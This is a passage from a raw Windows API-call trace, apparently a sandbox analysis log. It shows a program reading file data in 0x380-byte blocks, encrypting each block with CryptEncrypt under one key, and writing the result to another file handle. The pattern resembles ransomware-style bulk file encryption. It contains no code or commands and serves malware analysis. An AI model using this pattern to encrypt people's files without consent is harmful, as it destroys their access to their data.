lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.811] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.811] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.811] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.812] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.812] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.812] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.812] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.812] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.813] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.813] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.813] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.813] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.813] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.814] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.814] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.814] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.814] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.814] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.815] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.815] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.815] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.815] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.815] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.816] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.816] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.816] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.816] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.816] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.817] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.817] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.817] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.817] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.817] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.818] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.818] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.818] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.818] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.818] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.819] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.819] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.819] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.819] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.820] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 